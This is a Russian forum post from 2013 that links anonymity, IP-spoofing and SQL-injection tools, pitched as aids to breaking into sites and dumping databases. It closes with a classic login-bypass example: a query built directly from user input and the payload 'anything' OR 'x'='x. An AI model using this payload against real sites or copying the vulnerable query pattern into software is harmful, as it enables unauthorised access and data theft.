Показать сообщение отдельно
Старый 29.01.2013, 10:24   #1
glotur
Продвинутый читер
Аватар для glotur
OFFLINE
Регистрация: 04.01.2008
Возраст: 38
Сообщений: 200
Благодарностей:
240 всего
Мнения: + 872
Репутация: 721

Набор утилит по hack и anonymous пример взлома


Для анонимного входа на сайт можно использовать программы.
http://www.torproject.us/download/download-easy
Программа подмены реального IP
http://rutracker.org/forum/viewtopic.php?t=4423
Едем дальше.
Программа для проверки сайта на уязвимость - так же взлом и слитие базы.
http://www.itsecteam.com/products/ha...sql-injection/
Так же ихние релизы уязвимость сайта.
http://www.itsecteam.com/products/we...loiter-wappex/

Ещё очень поучительная вещь!!
http://www.cgisecurity.com/lib/WH-Wh..._XST_ebook.pdf

Это ещё не всё
__________________________________________________ _______________
Пример взлома :
Вот пример основного HTML формы с двумя входами, логин и пароль.

<form method="post" action="http://www.mudak.com/login.asp">

<input name="tfUName" type="text" id="tfUName">

<input name="tfUPass" type="password" id="tfUPass">

</ FORM>

Самый простой способ для login.asp работы является создание базы данных запрос, который выглядит так:

SELECT id
FROM logins
WHERE username = '$username'
AND password = '$password’

Если переменной $username и пароль $password непосредственно из пользовательского ввода, это может быть легко скомпрометированы. Предположим, что мы дали "Коля" в качестве имени пользователя и, что следующая строка была предоставлена в качестве пароля:все,'OR' х '=' x

SELECT id
FROM logins
WHERE username = 'Коля'
AND password = 'anything' OR 'x'='x'

Как входов веб-приложений из-за недостаточной обработки, использования или одиночные кавычки превратился WHERE SQL команды в двухкомпонентных пункта.

'x'='x' часть гарантирует, чтобы быть правдой независимо от того, первая часть содержит.

Это простой пример!![/HIDE]

Последний раз редактировалось dark; 31.01.2013 в 22:48.

ICQ ТриДваШесть501600

 
Ответить с цитированием
Сказали спасибо:
Недоступно (24.08.2013), Недоступно (27.03.2013)